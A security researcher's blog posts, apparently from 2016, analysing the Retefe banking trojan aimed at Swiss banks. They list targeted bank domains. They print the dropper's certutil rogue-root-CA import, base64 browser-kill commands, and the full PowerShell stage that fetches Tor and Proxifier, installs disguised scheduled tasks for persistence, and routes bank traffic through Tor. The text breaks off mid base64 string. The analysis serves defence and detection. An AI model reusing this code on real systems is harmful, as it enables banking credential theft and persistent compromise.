Wednesday, November 16, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (III)

Following last two posts, this is a quick update as I have detected that some new Swiss banks have been added to the list of victims of Retefe (since last time I checked some weeks ago)

 These are:

  *valiant.ch;*
 *wir.ch;
 *bankthalwil.ch;
 *piguetgalland.ch;
 *triba.ch;
 *inlinea.ch;
 *bernerlandbank.ch;
 *bancasempione.ch;
 *bsibank.com;
 *corneronline.ch;
 *vermoegenszentrum.ch;
 *gobanking.ch;
 *slbucheggberg.ch;
 *slfrutigen.ch;
 *hypobank.ch;
 *regiobank.ch;
 *rbm.ch;
 *hbl.ch;
 *ersparniskasse.ch;
 *ekr.ch;*
 sparkasse-dielsdorf.ch;
 *eki.ch;
 *bankgantrisch.ch;
 *bbobank.ch;
 *alpharheintalbank.ch;
 *aekbank.ch;*
 *acrevis.ch


Also, the Cyber Criminals have changed the way the malicious payload is weaponized through a malicious 'docx'.. Instead os using a JS script, now they are using an executable EXE:



Publicado por
Etiquetas: , ,

Monday, October 17, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (II)

A few days ago when I took a look to the latest Retefe campaign affecting Swiss financial Institutions, I did not have the time to take a deeper look to the malicious JS embedded in the .docx file.  So in this post I'll explain a bit about it. Particularly, I'm interested in understanding how the Proxifier tool is setup with a custom profile to forward the traffic through Tor. This tool is something Cyber Criminals have introduced recently, as previously they used a proxy PAC file which is setup in the registry key "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL"

Last analysis about Retefe from Avast shows exactly the behaviour described above.

Retefe is not just affecting Swiss banks, but also other countries banks, like UK. So it might be that the custom proxy file is hardcoded into the malicious JS or dynamically this file is downloaded. So let's take a look to it.

(I have upload the malicious JS payload to VT )

The JS is obfuscated so I'm using Visual Studio to perform some debugging.

The first interesting thing I see are the Tor URLs defined bvq64y3wwg3zzguk.onion, v7yxqrahkza3ewuv.onion, cvxbceskbuvsic3i.onion, a7j7f3rqdvoe5bav.onion,




Also,  there is the fake Comodo CA which it used to avoid the browser SSL warnings. This is base64 encoded.




There is a PowerShell script to simulate the "click" to accept the import of the CA certificate.








Then there is a command to import the certificate
"certutil -addstore -f -user \"ROOT\" \""

 and some base64 encoded commands to kill the browser running:


"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="
taskkill /F /im iexplore.exe

 "dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"
taskkill /F /im firefox.exe

"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="

taskkill /F /im chrome.exe

 So at this point the malicious certificate has been imported and all the browsers, after killking them, have the COMODO CA maliciuos certificate in their CA chain

 Debugging deeper, in the end, a temporal file is created which contains a PowerShell script the interesting stuff


This is the code

 

function Unzip
{
param([string]$zipfile, [string]$destination);
$7zaExe = Join-Path $env:Temp '7za.exe';
if (-NOT (Test-Path $7zaExe)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7zaExe);
}
Catch{}
}
if ($(Try { Test-Path $7zaExe.trim() } Catch { $false })){
Start-Process "$7zaExe" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function AddTask
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0);
$ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
$td=$ts.NewTask();
$td.RegistrationInfo.Description = 'Does something';
$td.Settings.DisallowStartIfOnBatteries = $False;
$td.Settings.StopIfGoingOnBatteries = $False;
$td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
$LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
$LogonTrigger.StartBoundary=[System.DateTime]::Now;
$LogonTrigger.UserId=$env:username;
$LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
$td.Triggers.Add($LogonTrigger);
if($restart -eq 1){
$TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
$TimeTrigger.StartBoundary=[System.DateTime]::Now;
$TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(20);
$TimeTrigger.Repetition.StopAtDurationEnd=$False;
$td.Triggers.Add($TimeTrigger);
}
$ExecAction=New-Object Microsoft.Win32.TaskScheduler.ExecAction($cmd,$params);
$td.Actions.Add($ExecAction);
$task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
$task.Run();
}
function InstallTP{
$File=$env:Temp+'\ts.zip';
$Dest=$env:Temp+'\ts';
(New-Object System.Net.WebClient).DownloadFile('http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031',$File);
if ((Test-Path $Dest) -eq 1){rm -Force -Recurse $Dest;}md $Dest | Out-Null;
Unzip $File $Dest;
rm -Force $File;
$TSAssembly=$Dest+'\v2.0\Microsoft.Win32.TaskScheduler.dll';
$loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
$TFile=$env:Temp+'\t.zip';
$DestTP=$env:APPDATA+'\TP';
(New-Object System.Net.WebClient).DownloadFile('https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip',$TFile);
if ((Test-Path $DestTP) -eq 1){rm -Force -Recurse $DestTP;}md $DestTP | Out-Null;
Unzip $TFile $DestTP;
rm -Force $TFile;
$tor=$DestTP+'\Tor\tor.exe';
$tor=$tor.Replace('\','/');
$tor_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$tor',0,false))`"";
AddTask 'SkypeUpdateTask' 'mshta.exe' $tor_cmd;
$PFile=$env:Temp+'\p1.zip';
$wc=new-object net.webclient;
$purl='http://proxifier.com/distr/ProxifierPE.zip';
$wc.DownloadFile($purl,$PFile);
Unzip $PFile $DestTP;
$p_old=$DestTP+'\Proxifier PE\';
rm -Force $PFile;
Rename-Item -path $p_old -newName 'p';
$p_fold=$DestTP+'\p\';
$p=$DestTP+'\p\Proxifier.exe';
$settings_file=$p_fold+'Settings.ini';
Base64ToFile $settings_file 'W1NldHRpbmdzXQ0KRGVmYXVsdE5ldFByb2ZpbGU9MTcxMTg3Njg4NQ0KTG9nTGV2ZWxTY3JlZW49Mg0KTG9nTGV2ZWxGaWxlPTANCkxvZ1BhdGg9DQpTeXNUcmF5SWNvbj0xDQpTeXNUcmF5SWNvblNob3dUcmFmZmljPTANClNob3dUcmFmZmljVHlwZT0wDQpUcmFmZmljUmVmcmVzaFNwZWVkPTENCkFjdGl2ZVByb2ZpbGU9RGVmYXVsdA0KUHJvZmlsZUF1dG9VcGRhdGU9MA0KUHJvZmlsZVVwZGF0ZVVybD0NClByb2ZpbGVVcGRhdGVVcmxUb0ZvbGRlcj0xDQpQcm9maWxlVXBkYXRlS2VlcExvZ2lucz0wDQpVcGRhdGVDaGVjaz0wDQpbV29ya3NwYWNlXQ0KQXBwbGljYXRpb25Mb29rPTIxNA0KUnVsZURsZ1dpZHRoPTczMg0KUnVsZURsZ0hlaWdodD00MzYNCltEZWZhdWx0XENvbnRyb2xCYXJWZXJzaW9uXQ0KTWFqb3I9OQ0KTWlub3I9MA0KW0RlZmF1bHRcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1BQUFBQUFBQUFBQUENCltEZWZhdWx0XENvbW1hbmRNYW5hZ2VyXQ0KQ29tbWFuZHNXaXRob3V0SW1hZ2VzPUFBQUENCk1lbnVVc2VySW1hZ2VzPUFBQUENCltEZWZhdWx0XENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW0RlZmF1bHRcUGFuZS01OTM5M10NCklEPTANClJlY3RSZWNlbnRGbG9hdD1LQUFBQUFBQUtBQUFBQUFBT0dBQUFBQUFPR0FBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1BQUFBQUFBQUdKQkFBQUFBRUVEQUFBQUFKS0JBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9NDA5Ng0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW0RlZmF1bHRcQmFzZVBhbmUtNTkzOTNdDQpJc1Zpc2libGU9MQ0KW0RlZmF1bHRcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBQ0FCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLS0xXQ0KSXNWaXNpYmxlPTENCltEZWZhdWx0XFBhbmUtMzEwXQ0KSUQ9MzEwDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTgxOTINClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbRGVmYXVsdFxQYW5lLTEwMjJdDQpJRD0xMDIyDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTEwMjJdDQpJc1Zpc2libGU9MA0KW0RlZmF1bHRcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUlQQUFBQUFBSUtCQUFBQUFBTUJBQUFBQUFIQ0FBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQUlPQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbRGVmYXVsdFxCYXNlUGFuZS0xMDIzXQ0KSXNWaXNpYmxlPTANCltEZWZhdWx0XERvY2tpbmdNYW5hZ2VyLTEyOF0NCkRvY2tpbmdQYW5lQW5kUGFuZURpdmlkZXJzPUFBQUFBQUFBQ0FBQUFBQUFBQUFBQUFBQUFBQUNBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQQUFBQUFBQUFDQUJBQUFBQUVFREFBQUFBR0FCQUFBQUFBQUFBQUFBQUJBQUFBQUFCRUFBQUFBQUFCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFQUFBQUFBQUERBQUFBQUFBR0RCQUFBQUFPUERBQUFBQVBQREFBQUFBUFBQUENBQUFMQUFBREVFRkJHQ0dDR0ZHRUdBRkJHT0dGR0FBQUNBQUFBQkFBQUFBQUFJUEFBQUFBQUlLQkFBQUFBQU1CQUFBQUFBSENBQUFBQUFBQUFBQUFBT0NBQUFBQUFFRURBQUFBQUNBQkFBQUFBQUFBQUFBQUFBRUVCQUFHRkRBQUFBQUFBUFBPUFBQTEFERUFBUEdBQU9HQUFPR0FBRkdBQURHQUFFSEFBSkdBQVBHQUFPR0FBREhBQUJBQUFBQUFBR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBQUE9QUFBIQUVGQUFDSEFBQkdBQUdHQUFHR0FBSkdBQURHQUFCQUFBQUFBQU9QREFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQS0FERkFBRUhBQUJHQUFFSEFBSkdBQURIQUFFSEFBSkdBQURHQUFESEFBQkFBQUFBQUFQUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ0KW1N0YXR1c10NCkZpcnN0UnVuPTANClN5c1RyeUljb25NZXNzYWdlU2hvd249MQ0KW1dvcmtzcGFjZVxDb250cm9sQmFyVmVyc2lvbl0NCk1ham9yPTkNCk1pbm9yPTANCltXb3Jrc3BhY2VcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1HRkFBQUFBQUVCQUFBRUJPQUFBQUJBQUFBQUFBTkFFQUFBQUFDQUFBQUFBQVBIQUlBQUFBQkFBQUFBQUFFQUJPQUFBQUJBQUFBQUFBT0JBSUFBQUFHQkFBQUFBQU9FQUlBQUFBREFBQUFBQUFQRkFJQUFBQUNBQUFBQUFBTEVBSUFBQUFCQUFBQUFBQU1BRUFBQUFBQkFBQUFBQUFPSEFJQUFBQUJBQUFBQUFBREFCT0FBQUFDQUFBQUFBQU5CQUlBQUFBQUJBQUFBQUFQREFJQUFBQUxBQUFBQUFBQUFFQUFBQUFDQUFBQUFBQUNDQk9BQUFBQ0FBQUFBQUFESUFJQUFBQURBQUFBQUFBTURBSUFBQUFFQUFBQUFBQUtFQUlBQUFBSUFBQUFBQUFNQkFJQUFBQUNBQUFBQUFBT0RBSUFBQUFCQUFBQUFBQQ0KW1dvcmtzcGFjZVxDb21tYW5kTWFuYWdlcl0NCkNvbW1hbmRzV2l0aG91dEltYWdlcz1BQUFBDQpNZW51VXNlckltYWdlcz1BQUFBDQpbV29ya3NwYWNlXENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW1dvcmtzcGFjZVxQYW5lLTU5MzkzXQ0KSUQ9MA0KUmVjdFJlY2VudEZsb2F0PUtBQUFBQUFBS0FBQUFBQUFPR0FBQUFBQU9HQUFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUFBQUFBQUFBR0pCQUFBQUFFRURBQUFBQUpLQkFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTU5MzkzXQ0KSXNWaXNpYmxlPTENCltXb3Jrc3BhY2VcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBSEJCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltXb3Jrc3BhY2VcQmFzZVBhbmUtLTFdDQpJc1Zpc2libGU9MQ0KW1dvcmtzcGFjZVxQYW5lLTMxMF0NCklEPTMxMA0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbV29ya3NwYWNlXFBhbmUtMTAyMl0NCklEPTEwMjINClJlY3RSZWNlbnRGbG9hdD1DQUJBQUFBQUlCQkFBQUFBS01CQUFBQUFBT0JBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1FQUFBQUFBQUdFQUFBQUFBQUVEQUFBQUFOUEFBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9ODE5Mg0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW1dvcmtzcGFjZVxCYXNlUGFuZS0xMDIyXQ0KSXNWaXNpYmxlPTANCltXb3Jrc3BhY2VcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTEwMjNdDQpJc1Zpc2libGU9MA0KW1dvcmtzcGFjZVxEb2NraW5nTWFuYWdlci0xMjhdDQpEb2NraW5nUGFuZUFuZFBhbmVEaXZpZGVycz1BQUFBQUFBQUNBQUFBQUFBQUFBQUFBQUFBQUFDQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBSEJCQUFBQUFFRURBQUFBQUxCQkFBQUFBQUFBQUFBQUFCQUFBQUFBQkVBQUFBQUFBQkFBQUFBQUFHSk9QUFBQUElGQUFBQUFBUFBQUFBQUFBEQUFBQUFBQUdEQkFBQUFBT1BEQUFBQUFQUERBQUFBQVBQUFBDQUFBTEFBQURFRUZCR0NHQ0dGR0VHQUZCR09HRkdBQUFDQUFBQUJBQUFBQUFBSVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUFBQUFBQUFBQU9DQUFBQUFBRUVEQUFBQUFIQkJBQUFBQUFBQUFBQUFBQUVFQkFBR0ZEQUFBQUFBQVBQT1BQUExBREVBQVBHQUFPR0FBT0dBQUZHQUFER0FBRUhBQUpHQUFQR0FBT0dBQURIQUFCQUFBQUFBQUdEQkFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQSEFFRkFBQ0hBQUJHQUFHR0FBR0dBQUpHQUFER0FBQkFBQUFBQUFPUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUFBQT1BQUEtBREZBQUVIQUFCR0FBRUhBQUpHQUFESEFBRUhBQUpHQUFER0FBREhBQUJBQUFBQUFBUFBEQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUENCltXb3Jrc3BhY2VcV2luZG93UGxhY2VtZW50XQ0KTWFpbldpbmRvd1JlY3Q9QVBBQUFBQUFLSUJBQUFBQUVFRUFBQUFBSkZEQUFBQUENCkZsYWdzPTANClNob3dDbWQ9MQ0KW0xpY2Vuc2VdDQpPd25lcj0yVENLWC1UWVFITC1ORk4zMy0zWUVEWS1RVzY1RA0KS2V5PTJUQ0tYLVRZUUhMLU5GTjMzLTNZRURZLVFXNjVEDQo=';
$p_prof=$p_fold+'Profiles\';
md $p_prof | Out-Null;
$def_file=$p_prof+'Default.ppx';
Base64ToFile $def_file 'PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2VycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgIDxUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVmb3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4=';
AddTask 'ChromeUpdate' $p '' 1;
}
InstallTP


In the beginning, there is a function 'unzip' in charge of downloading an application from URL https://chocolatey.org/7za.exe to unzip compressed files.

 Then, the function 'Base64ToFile' does a base64 decode of a string and stores the output in a file

 But the key function, is the last one, InstallTP, which does several things:
  1. Pulls a file from http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031 Which permits to run the malicious process automatically as a task
  2. Pulls the Tor client from https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip to forward the traffic through Tor
  3.  Pulls the Proxifier application from http://proxifier.com/distr/ProxifierPE.zip
  4. Configures the Settings.ini for the Proxyfier
  5. And finally, it is the interesting stuff, the Proxifier profile, where I can see all the banks for which the traffic is sent through Tor

echo "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYX